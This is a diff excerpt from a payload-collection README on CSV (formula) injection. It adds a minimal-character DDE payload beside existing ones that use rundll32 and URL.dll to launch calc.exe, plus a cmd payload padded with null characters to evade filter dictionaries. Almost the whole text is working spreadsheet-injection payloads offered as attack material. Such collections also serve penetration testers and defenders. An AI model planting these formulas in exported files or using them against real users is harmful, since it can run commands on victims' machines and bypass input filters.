swisskyrepo/PayloadsAllTheThings/CSV Injection/README.md

 =rundll32|'URL.dll,OpenURL calc.exe'!A
 =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

+# Using a minimal number of special characters.
+This example only needs ! = and ' not being filtered.
+=rundll32|'URL OpenURL calc'!A

 # Using null characters to bypass dictionary filters.
 Since they are not spaces, they are ignored when executed.
 =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !
 A